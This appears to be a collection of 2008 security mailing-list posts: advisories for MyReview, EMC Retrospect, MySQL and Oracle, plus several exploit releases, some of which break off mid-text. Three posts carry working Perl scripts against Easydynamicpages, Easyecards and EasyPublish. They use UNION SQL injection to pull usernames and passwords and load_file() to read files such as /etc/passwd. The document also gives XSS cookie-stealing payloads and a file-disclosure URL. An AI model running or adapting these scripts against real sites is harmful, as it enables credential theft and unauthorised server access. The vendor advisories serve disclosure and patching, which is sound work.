## EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability |, .-. .-. ,| Found by : Ghost Hacker [ R-H TeaM ] | )(_o/ \o_)( | My Site web : Real-hack.Net |/ /\ \| ## [~] Found by : Ghost Hacker [ R-H TeaM ] [~] Home page : www.Real-hack.net [~] Email : [EMAIL PROTECTED] [~] Name Script : EZWebAlbum [~] Download Script : http://sourceforge.net/projects/ezwebalbum ## [ Viva IslaM & KSA ] ## [~] Error (download.php) : readfile($dlfilename); [~] Exploit : http:///[path]/download.php?dlfilename=EVIL [~] Example : http:///[path]/download.php?dlfilename=index.php ## [ Viva IslaM & KSA ] ## [~] Greetz : PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker .. Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ] All Members Real Hack And All My Friends .. ## Found by : Ghost Hacker [ R-H TeaM ] ## _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Easydynamicpages 30tr Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl
#
#
#Script : Easydynamicpages 30tr
#
#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure
Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Offical Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :
http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip
#
#
#
#Xss 1 :
http://Example/staticpages/easycalendar/index.php?PageSection=1&month=4&year=alert(document.cookie);
#
#
#
#SQL Injection :
#
#SQL 1 :
http://Example/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
* Easydynamicpages 30tr Exploit*
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}
sub usage
{
print "
* Usage : perl $0 http://Example/
";
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul =
"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(//,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2
sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd";
print "\n Enter File Address :";
$fil3 = ;
$vul =
"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
}
#XPL2 END
#Starting;
print "
* Easydynamicpages 30tr Exploit*
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
* Mod Options :
Vulnerability CVE-2008-3671 - MyReview's vulnerability in the access control system
Incorrect management of the submission and camera ready versions of submitted papers to the MyReview system lets unintended users download these documents. This information leakage can be used to illegally retrieve sensitive or licensed documents. I. Description The MyReview web application is an open-source web application used in the research community To manage the paper submission and paper review phases of conferences. Based on the well known PHP+MySQL framework and distributed under the GNU General Public License, it has been used by thousands of conferences worldwide. Incorrect management of the submission and camera ready versions of submitted papers to the MyReview system lets unintended users download these documents. This flaw bypass all the access controls implemented by the MyReview developers. This information leakage is critical as the documents submitted to the conferences, and mostly at the submission phase, contain sensitives information researchers may not want to be publicized. Besides, this flaw can be used by attackers to retrieve at will the final version of the documents, after the conferences is done. However, these final versions may be not free, as it is often the case for conferences. More information about this flaw will be publicized later on, as it could be used to attack existing deployment of the MyReview system. II. Impact Exploitation of this vulnerability could lead to the lost of the sensitive information managed by MyReview: submission and camera ready version of the submitted paper may be downloaded III. Solution The Laboratoire de Recherche en Informatique (LRI), which provide MyReview has been contacted and they receive a patch I made for this vulnerability. However, to avoid unpatched website attacks (which are very easy to do), the author decided to let the LRI making the decision about how to efficiently performed the update. Please see your vendor's advisory for updates and mitigation capabilities. A good point would be to subscribe to MyReview newsletter, if not done yet. Version and platform Affected Affected Platforms - Any Affected Software - MyReview, http://myreview.intellagence.eu/ Affected Versions - Any (prior or equal to 1.9.9, as 2.0 is still in beta) Severity - High Requirements Authentication - None Access - Distant (Internet) References Credit This vulnerability was reported by Julien A. Thomas. Contact : [EMAIL PROTECTED] TELECOM Bretagne homepage: http://perso.telecom-bretagne.eu/julienthomas/ Personal homepage: http://www.julienthomas.eu/ Other Information Date Discovered - 16/07/2008 Date Public - 18/07/2008 Date First Published - 18/07/2008 Date Last Updated - 18/07/2008 CVE Name (candidate) - CVE-2008-3671 PS: sorry if this message was sent twice put I got some mailer-daemons rejects ... Julien
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability http://www.fortiguardcenter.com/advisory/FGA-2008-16.html July 20, 2008 -- Affected Vendors: EMC -- Affected Products: EMC Dantz Retrospect 7 backup Client 7.5.116 -- Vulnerability Details: The retroclient.exe process listens, in a default configuration, on TCP port 497. When Continued sending packets with length of 2064 bytes and filling with 0x00, about 30 seconds to 5 minutes the status box shows: “Client networking not available, or service not running” , keep on sending packets and few times later retroclient.exe process terminate, backup service lost, TCP port 497 closed . -- Vendor Response: EMC has issued an update to correct this vulnerability: http://www.emcinsignia.com/updates -- Disclosure Timeline: 2008-04-20 - Vulnerability reported to vendor 2008-06-30 - Vendor issued update 2088-07-20 - Coordinated public release of advisory Acknowledgment: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California.
EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability
FGA-2008-16: EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability http://www.fortiguardcenter.com/advisory/FGA-2008-16.html July 20, 2008 -- Affected Vendors: EMC -- Affected Products: EMC Dantz Retrospect 7 backup Client 7.5.116 -- Vulnerability Details: The transfer of Password Hash of EMC Dantz Retrospect 7 backup Client in the network is plaintext. By sending a malicious packet to the client, client will send back lots information including Password Hash resulting in a loss of confidentiality. What is more, EMC Dantz Retrospect 7 backup server's authentication module using weak password hash arithmetic, By buteforce it attacker can gain full control of client's machine -- Vendor Response: EMC has issued an update to correct this vulnerability: http://www.emcinsignia.com/updates -- Disclosure Timeline: 2008-04-20 - Vulnerability reported to vendor 2008-06-30 - Vendor issued update 2088-07-20 - Coordinated public release of advisory Acknowledgment: Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team Disclaimer: Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. About Fortinet ( www.fortinet.com ): Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California.
Maran PHP Blog Xss By Khashayar Fereidani
Script : Maran PHP Blog Type : XSS (Pasive) Method : GET Alert : Medium Discovered by : Khashayar Fereidani a.k.a. Dr.Crash My Offical Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR Script Download : http://www.maran.pamil-visions.com/download2.php?dir=maranphp&file=maranblog.zip This Is One Xss Vulnerability in ID Variable . Attacker Can Execute JavaScript Code And Get Admin Cookie And Send new article with admin cookie . Xss Address : http://Example/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E Solution : Edit Source Code And Filter id Variable With htmlspecialchars() function in comments.php ... line 32 : '> Change It To : '> Tnx : God HTTP://IRCRASH.COM
[ MDVSA-2008:150 ] - Updated mysql packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:150 http://www.mandriva.com/security/ ___ Package : mysql Date: July 19, 2008 Affected: 2007.1, 2008.0, Corporate 4.0 ___ Problem Description: Multiple buffer overflows in yaSSL, which is used in MySQL, allowed remote attackers to execute arbitrary code (CVE-2008-0226) or cause a denial of service via a special Hello packet (CVE-2008-0227). Sergei Golubchik found that MySQL did not properly validate optional data or index directory paths given in a CREATE TABLE statement; as well it would not, under certain conditions, prevent two databases from using the same paths for data or index files. This could allow an authenticated user with appropriate privilege to create tables in one database to read and manipulate data in tables later created in other databases, regardless of GRANT privileges (CVE-2008-2079). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079 ___ Updated Packages: Mandriva Linux 2007.1: 56e59e5a7413ca900767afa20480fff5 2007.1/i586/libmysql15-5.0.45-8.2mdv2007.1.i586.rpm c11348f9b60a3fb153cf07a7b2e22502 2007.1/i586/libmysql-devel-5.0.45-8.2mdv2007.1.i586.rpm a60fca42161427ed528a6a1fd58c61e3 2007.1/i586/libmysql-static-devel-5.0.45-8.2mdv2007.1.i586.rpm a6c4108497edb6cd0d7f723ca5f81c1f 2007.1/i586/mysql-5.0.45-8.2mdv2007.1.i586.rpm 62b091bfed614ed2be0e9f1dabc00e6e 2007.1/i586/mysql-bench-5.0.45-8.2mdv2007.1.i586.rpm 65c4cbcbaa11ad0fd5521ff9821a0e71 2007.1/i586/mysql-client-5.0.45-8.2mdv2007.1.i586.rpm 6cafb4fc0190c3d8c301737cc1b2d584 2007.1/i586/mysql-common-5.0.45-8.2mdv2007.1.i586.rpm ab7ff6bc5ed1e3add97e87eadffdf7d0 2007.1/i586/mysql-max-5.0.45-8.2mdv2007.1.i586.rpm 0c0d3817061fed8a9495b976e9aad4f6 2007.1/i586/mysql-ndb-extra-5.0.45-8.2mdv2007.1.i586.rpm e180f9184b397c76f121fa2cbcc249ee 2007.1/i586/mysql-ndb-management-5.0.45-8.2mdv2007.1.i586.rpm 11f6b6b340ec050489117a31ba1ada7b 2007.1/i586/mysql-ndb-storage-5.0.45-8.2mdv2007.1.i586.rpm 27d5c830d808a9198b5a3234ab635c31 2007.1/i586/mysql-ndb-tools-5.0.45-8.2mdv2007.1.i586.rpm 0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 861ae8a12d105c0537345f4b1b6364a6 2007.1/x86_64/lib64mysql15-5.0.45-8.2mdv2007.1.x86_64.rpm 74995c774432f4acacf682d14b738bae 2007.1/x86_64/lib64mysql-devel-5.0.45-8.2mdv2007.1.x86_64.rpm 5453d884b0edf40606bd78e62aef8101 2007.1/x86_64/lib64mysql-static-devel-5.0.45-8.2mdv2007.1.x86_64.rpm ef7ab96c6a492dad1a5f1463eaf5568b 2007.1/x86_64/mysql-5.0.45-8.2mdv2007.1.x86_64.rpm e6527ea8482a7928095a2d1d24953ad6 2007.1/x86_64/mysql-bench-5.0.45-8.2mdv2007.1.x86_64.rpm 896ed2418af55577669d67b2b110fded 2007.1/x86_64/mysql-client-5.0.45-8.2mdv2007.1.x86_64.rpm 9cfc765f29d39220862dd8b38a7baddb 2007.1/x86_64/mysql-common-5.0.45-8.2mdv2007.1.x86_64.rpm f738941dbf2fb982e5f91ad1f5b8dd99 2007.1/x86_64/mysql-max-5.0.45-8.2mdv2007.1.x86_64.rpm 604b3cdacc031819c1a76f64974e 2007.1/x86_64/mysql-ndb-extra-5.0.45-8.2mdv2007.1.x86_64.rpm 944f87e17f3a30a41392b57005b3866d 2007.1/x86_64/mysql-ndb-management-5.0.45-8.2mdv2007.1.x86_64.rpm abe714a023e8019dc2379f38a10287c6 2007.1/x86_64/mysql-ndb-storage-5.0.45-8.2mdv2007.1.x86_64.rpm 60585f5c00ea687c710da9bf8dc620b0 2007.1/x86_64/mysql-ndb-tools-5.0.45-8.2mdv2007.1.x86_64.rpm 0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 32915a44b313f9752d53864929acacef 2008.0/i586/libmysql15-5.0.45-8.2mdv2008.0.i586.rpm 886f68f93c90d168f0f376f2bdf19dfe 2008.0/i586/libmysql-devel-5.0.45-8.2mdv2008.0.i586.rpm 05d52109e0e751d6ecb330361f0c49b1 2008.0/i586/libmysql-static-devel-5.0.45-8.2mdv2008.0.i586.rpm c2d269602985c48dbfaa56edbb2089a5 2008.0/i586/mysql-5.0.45-8.2mdv2008.0.i586.rpm fe5a49a0dbcf5b5b862fa15c697ec734 2008.0/i586/mysql-bench-5.0.45-8.2mdv2008.0.i586.rpm 5d9e574e07b13db1e98ac5084ef24c52 2008.0/i586/mysql-client-5.0.45-8.2mdv2008.0.i586.rpm c3a73f6ba9467995e4eeeb2994987e8c 2008.0/i586/mysql-common-5.0.45-8.2mdv2008.0.i586.rpm faca35a011bd9e95c3aded56c498efe7 2008.0/i586/mysql-max-5.0.45-8.2mdv2008.0.i586.rpm ae5bece63ecfacd37582c68288e146a6 2008.0/i586/mysql-ndb-extra-5.0.45-8.2mdv2008.0.i586.rpm 6948d8799ff1e8e9ae3908dcfdfafc2a 2008.0/i586/mysql-ndb-management-5.0.45-8.2md
Easyecards 310a Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) By Khashayar Fereidani
#!/usr/bin/perl
#
#
#Script : Easyecards 310a
#
#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure
Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Offical Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip
#
#
#Xss 1 : http://Example/?ResultHtml=alert('xss')
#
#Xss 2 :
http://Example/index.php?step=2&dir=<''"alert('xss')
#
#Xss 3 :
http://Example/index.php?step=2&SenderName=<''"alert('xss')
#
#Xss 4 :
http://Example/index.php?step=2&RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#Xss 5 :
http://Example/index.php?step=2&SenderMail=<''"alert('xss')
#
#Xss 6 :
http://Example/index.php?step=2&RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#
#
#SQL Injection :
#
#SQL 1 :
http://Example/index.php?show=pickup&sid=9'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
*Easyecards 310a Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}
sub usage
{
print "
* Usage : perl $0 http://Example/
";
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul =
"?show=pickup&sid=9'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(//,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2
sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd";
print "\n Enter File Address :";
$fil3 = ;
$vul =
"?show=pickup&sid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
}
#XPL2 END
#Starting;
print "
*Easyecards 310a Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website :
EasyPublish 3.0tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl
#
#
#Script : EasyPublish 3.0tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File
Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip
#
#
#
#Xss 1 :
http://Example//staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_News&read=%alert(document.cookie);
#
#
#
#SQL Injection :
#
#SQL 1 :
http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
* EasyPublish 3.0tr Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}
sub usage
{
print "
* Usage : perl $0 http://Example/
";
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul =
"/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(//,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2
sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd";
print "\n Enter File Address :";
$fil3 = ;
$vul =
"/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(//,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
}
#XPL2 END
#Starting;
print "
* EasyPublish 3.0tr Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
***
RE: Windows Vista Power Management & Local Security Policy
If Jim is going to get Nancy to run a program, and that's "not all that hard," then why not just have that program do what you want in the first place rather than worrying about the power switch nonsense? This is the one million and fourth time: "If your 'vulnerability' begins with 'if I can get the user to run code' then whatever comes after the 'then' doesn't matter. Period." t > -Original Message- > From: Abe Getchell [mailto:[EMAIL PROTECTED] > Sent: Saturday, July 19, 2008 12:33 AM > To: 'Jim Harrison'; bugtraq@securityfocus.com > Subject: RE: Windows Vista Power Management & Local Security Policy > > As stated in my original e-mail to the list, I definitely don't think > that > this is a security vulnerability in a traditional sense. I completely > agree > with you. Think about it this way... When you press the power button on > the > machine and it performs a graceful shutdown, stuff happens inside of > the > operating system. That stuff happens at an elevated privilege level. If > there were some way to hook into the stuff that happens, you (as an > unauthenticated user), could do bad things (besides simply shutting > down the > system) using that hook simply by pressing the power button at the > logon > screen. For example, if Jim wants to know what Nancy is working on, he > could > write a program which e-mails him the contents of her "My Documents" > folder > that is triggered by a hook into that process. All Jim needs to do is > get > Nancy to run that program on her system (not hard) and walk by her > office > when she's not there and hit the power button (also not hard). So what > can > _I_ do with this bug? Not much, I'm not that great of a programmer... > but I > think someone out there could do some nasty stuff. > > -- > Abe Getchell > [EMAIL PROTECTED] > https://abegetchell.com/ > > > > -Original Message- > > From: Jim Harrison [mailto:[EMAIL PROTECTED] > > Sent: Saturday, July 19, 2008 1:36 AM > > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com > > Subject: RE: Windows Vista Power Management & Local Security Policy > > > > Abe, > > > > Other than a denial-of-service from the console (is the power switch > > now a security vuln, too?), what can you do with this bug? It's > > absolutely, unquestionably a "bug"; the user should see behavior as > > dictated by logic and described in the documentation, but a "security > > vulnerability"? > > > > I think that's stretching things juust a bit. > > > > Jim > > > > -Original Message- > > From: Abe Getchell [mailto:[EMAIL PROTECTED] > > Sent: Thursday, July 17, 2008 7:39 PM > > To: bugtraq@securityfocus.com > > Subject: Windows Vista Power Management & Local Security Policy > > > > When the security option "Shutdown: Allow system to be shutdown > without > > having to log on" (in the local security policy) is set to "Disable", > > and > > the power management setting "When I press the power button" is set > to > > "Shut > > Down", it is possible for an unauthenticated user to press the power > > button > > at the Windows logon screen and gracefully shutdown the system. The > > explanation of this security option, taken from the local security > > policy, > > is as follows: > > > > "Shutdown: Allow system to be shut down without having to log on > > > > This security setting determines whether a computer can be shut down > > without > > having to log on to Windows. > > > > When this policy is enabled, the Shut Down command is available on > the > > Windows logon screen. > > > > When this policy is disabled, the option to shut down the computer > does > > not > > appear on the Windows logon screen. In this case, *users must be able > > to log > > on to the computer successfully and have the Shut down the system > user > > right > > before they can perform a system shutdown*. > > > > Default on workstations: Enabled. > > Default on servers: Disabled." > > > > Note the text between the asterisks. While this bug isn't necessarily > a > > software flaw allowing for an intrusion into the system in a > > traditional > > sense, it does set a bad precedence in that power management has a > free > > pass > > to bypass local security policy and perform actions expressly against > > the > > defined policy. It appears that the only impact the use of this > > security > > option actually has is enabling or disabling the display of the > "power > > button" on the Windows logon screen (locally only - this setting has > no > > affect on remote desktop connections - the "power button" is not > > displayed > > in either case), not actually preventing anyone from (gracefully) > > shutting > > down the system without logging in. > > > > I reported this to the MSRC on 6/25/2008 and their stance was that > this > > wasn't a security vulnerability, but was likely a bug, and was passed > > directly to the product team to investigate through their normal bug > > triage > > process. After some back and forth, there was silence, and I
Re: Oracle Database Local Untrusted Library Path Vulnerability
It is reported to Oracle since 2004 by open3s and affects others libs. The
workaround is very simple but it is "under investigation / being fixed in
main codeline. Scheduled for future cpu"
regards
juan manuel pascual
On Sat, 19 Jul 2008, Joxean Koret wrote:
Oracle Database Local Untrusted Library Path Vulnerability
--
The Oracle July 2008 Critical Patch Update fixes a vulnerability which
allows a user in the OINSTALL/DBA group to scalate privileges to root.
Scalating Privileges from "oracle" to "root"
In Oracle 10g R2 and later (Oracle11g is also vulnerable) the affected
binary, $ORACLE_HOME/bin/extjob, is SUID root and must be suid root. In
the following forum from Oracle you will found a note at the bottom of
the page:
(...)
In 10.2.0.2 and higher
rdbms/admin/externaljob.ora file must must be owned by root:oraclegroup
and
be writable only by the owner i.e. 644 (rw-r--r--)
bin/extjob file must be also owned by root:oraclegroup but must be
setuid i.e. 4750 (-rwsr-x---)
bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned
by
oracle:oraclegroup
In 11g and higher
Same as 10.2.0.2 but additionally bin/jssu should exist with root
setuid
permissions i.e. owned by root:oraclegroup with 4750 (-rwsr-x---)
(...)
The "oraclegroup" is commonly "dba" or "oinstall". Regardless of the
